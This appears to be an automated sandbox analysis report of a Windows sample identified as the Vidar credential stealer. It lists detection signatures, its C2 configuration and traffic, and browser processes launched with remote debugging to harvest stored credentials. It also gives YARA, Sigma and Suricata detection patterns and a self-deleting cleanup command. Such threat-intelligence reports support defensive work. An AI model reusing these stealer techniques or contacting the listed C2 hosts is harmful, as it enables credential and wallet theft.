Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
dZKPE9gotO.exe

Overview

General Information

Sample name:dZKPE9gotO.exe
renamed because original name is a hash value
Original sample name:876a365bda09b9ef39605e375d677f0a.exe
Analysis ID:1576158
MD5:876a365bda09b9ef39605e375d677f0a
SHA1:2c12b38ed2d84722cf5dcea8bd45cfa7d7b55ba4
SHA256:ed252fe89ba1243bad21f373c952b16940a0094149b0be50e5c3da9c20a23234
Tags:exeuser-abuse_ch
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contain functionality to detect virtual machines
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Monitors registry run keys for changes
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (date check)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • dZKPE9gotO.exe (PID: 2000 cmdline: "C:\Users\user\Desktop\dZKPE9gotO.exe" MD5: 876A365BDA09B9EF39605E375D677F0A)
    • chrome.exe (PID: 7392 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 7704 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2844 --field-trial-handle=2300,i,8023448813731883458,15502527329942083747,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • msedge.exe (PID: 1928 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)
      • msedge.exe (PID: 6792 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2716 --field-trial-handle=2484,i,735169175553116458,11203760071663771088,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • cmd.exe (PID: 8352 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\PP89HLXLFCBI" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 8220 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
    • WerFault.exe (PID: 6488 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2000 -s 3064 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • msedge.exe (PID: 3952 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 5088 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2220 --field-trial-handle=1968,i,4773642217830312102,9382657893899972247,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 5576 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6260 --field-trial-handle=1968,i,4773642217830312102,9382657893899972247,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7356 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6552 --field-trial-handle=1968,i,4773642217830312102,9382657893899972247,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 3968 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6704 --field-trial-handle=1968,i,4773642217830312102,9382657893899972247,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": "https://steamcommunity.com/profiles/76561199807592927", "Botnet": "d0wntg"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
    • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
    00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000002.2205131048.0000000000A29000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
        • 0x1318:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
        Process Memory Space: dZKPE9gotO.exe PID: 2000JoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          Click to see the 1 entries

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Browser Started with Remote Debugging
          Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\dZKPE9gotO.exe", ParentImage: C:\Users\user\Desktop\dZKPE9gotO.exe, ParentProcessId: 2000, ParentProcessName: dZKPE9gotO.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 7392, ProcessName: chrome.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-16T15:39:41.047529+010020442471Malware Command and Control Activity Detected116.203.12.114443192.168.2.749711TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-16T15:39:43.453157+010020518311Malware Command and Control Activity Detected116.203.12.114443192.168.2.749720TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-16T15:39:38.746601+010020490871A Network Trojan was detected192.168.2.749704116.203.12.114443TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: dZKPE9gotO.exeAvira: detected
          Antivirus detection for URL or domain
          Source: https://sedone.online/CWz#Avira URL Cloud: Label: malware
          Source: https://sedone.online/oWF#Avira URL Cloud: Label: malware
          Source: https://sedone.onlineAvira URL Cloud: Label: malware
          Source: https://sedone.online/pWAvira URL Cloud: Label: malware
          Found malware configuration
          Source: 0.2.dZKPE9gotO.exe.400000.0.unpackMalware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199807592927", "Botnet": "d0wntg"}
          Multi AV Scanner detection for submitted file
          Source: dZKPE9gotO.exeReversingLabs: Detection: 76%
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Machine Learning detection for sample
          Source: dZKPE9gotO.exeJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_0040B006 CryptUnprotectData,LocalAlloc,LocalFree,0_2_0040B006
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_00414B70 CryptBinaryToStringA,HeapAlloc,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,GetLastError,HeapFree,GetProcessHeap,HeapFree,0_2_00414B70
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009BB26D CryptUnprotectData,LocalAlloc,LocalFree,0_2_009BB26D
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009C4DD7 CryptBinaryToStringA,GetProcessHeap,CryptBinaryToStringA,GetLastError,GetProcessHeap,0_2_009C4DD7

          Compliance

          barindex
          Detected unpacking (overwrites its own PE header)
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeUnpacked PE file: 0.2.dZKPE9gotO.exe.400000.0.unpack
          Source: dZKPE9gotO.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
          Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49700 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 116.203.12.114:443 -> 192.168.2.7:49701 version: TLS 1.2
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_0040DE0C FindFirstFileA,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040DE0C
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_00401825 EntryPoint,FindFirstFileA,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindFirstFileA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00401825
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_0040CCF2 FindFirstFileA,FindFirstFileA,CopyFileA,CopyFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040CCF2
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_0040B942 FindFirstFileA,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,DeleteFileA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,CopyFileA,FindNextFileA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,Sleep,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindClose,0_2_0040B942
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_0040D820 FindFirstFileA,FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040D820
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009C92FC GetProcessHeap,FindFirstFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_009C92FC
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009CAE0D SHGetFolderPathA,wsprintfA,FindFirstFileA,strcmp,strcmp,_mbscpy,_splitpath,_mbscpy,strlen,isupper,wsprintfA,_mbscpy,strlen,SHFileOperation,FindClose,0_2_009CAE0D
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009C986A FindFirstFileA,StrCmpCA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_009C986A
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009C8952 FindFirstFileA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_009C8952
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
          Source: chrome.exeMemory has grown: Private usage: 7MB later: 30MB

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.7:49704 -> 116.203.12.114:443
          Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.203.12.114:443 -> 192.168.2.7:49711
          Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.203.12.114:443 -> 192.168.2.7:49720
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199807592927
          Source: global trafficTCP traffic: 192.168.2.7:50848 -> 1.1.1.1:53
          Source: global trafficHTTP traffic detected: GET /detct0r HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
          Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
          Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
          Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
          Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
          Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
          Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
          Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
          Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
          Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
          Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
          Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
          Source: unknownTCP traffic detected without corresponding DNS query: 23.33.40.139
          Source: unknownTCP traffic detected without corresponding DNS query: 23.33.40.139
          Source: unknownTCP traffic detected without corresponding DNS query: 23.33.40.139
          Source: unknownTCP traffic detected without corresponding DNS query: 23.58.157.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.58.157.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.58.157.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.219.82.75
          Source: unknownTCP traffic detected without corresponding DNS query: 23.219.82.75
          Source: unknownTCP traffic detected without corresponding DNS query: 18.173.219.84
          Source: unknownTCP traffic detected without corresponding DNS query: 18.173.219.84
          Source: unknownTCP traffic detected without corresponding DNS query: 23.219.82.75
          Source: unknownTCP traffic detected without corresponding DNS query: 18.173.219.84
          Source: unknownTCP traffic detected without corresponding DNS query: 23.33.40.139
          Source: unknownTCP traffic detected without corresponding DNS query: 23.33.40.139
          Source: unknownTCP traffic detected without corresponding DNS query: 23.33.40.139
          Source: unknownTCP traffic detected without corresponding DNS query: 23.33.40.139
          Source: unknownTCP traffic detected without corresponding DNS query: 23.33.40.139
          Source: unknownTCP traffic detected without corresponding DNS query: 23.58.157.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.58.157.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.58.157.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.58.157.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.58.157.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.219.82.75
          Source: unknownTCP traffic detected without corresponding DNS query: 23.219.82.75
          Source: unknownTCP traffic detected without corresponding DNS query: 23.219.82.75
          Source: unknownTCP traffic detected without corresponding DNS query: 23.219.82.75
          Source: unknownTCP traffic detected without corresponding DNS query: 23.219.82.75
          Source: unknownTCP traffic detected without corresponding DNS query: 18.173.219.84
          Source: unknownTCP traffic detected without corresponding DNS query: 18.173.219.84
          Source: unknownTCP traffic detected without corresponding DNS query: 18.173.219.84
          Source: unknownTCP traffic detected without corresponding DNS query: 18.173.219.84
          Source: unknownTCP traffic detected without corresponding DNS query: 18.173.219.84
          Source: unknownTCP traffic detected without corresponding DNS query: 23.58.157.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.58.157.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.58.157.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.58.157.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.58.157.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.58.157.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.58.157.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.58.157.24
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_00406C70 InternetOpenA,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,Sleep,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00406C70
          Source: global trafficHTTP traffic detected: GET /detct0r HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: sedone.onlineConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIk6HLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIk6HLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /statics/icons/favicon_newtabpage.png HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=360240197938679F2CDC554E78216658; _EDGE_S=F=1&SID=06106C5D388F6449242F790A39256585; _EDGE_V=1
          Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1734365264027&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=14874f7f2a824b9dbbfbe14fe01fe973&activityId=14874f7f2a824b9dbbfbe14fe01fe973&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=360240197938679F2CDC554E78216658; _EDGE_S=F=1&SID=06106C5D388F6449242F790A39256585; _EDGE_V=1
          Source: global trafficHTTP traffic detected: GET /b?rn=1734365264028&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=360240197938679F2CDC554E78216658&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /b2?rn=1734365264028&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=360240197938679F2CDC554E78216658&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=196c9ae1eb685612d5282a91734360018; XID=196c9ae1eb685612d5282a91734360018
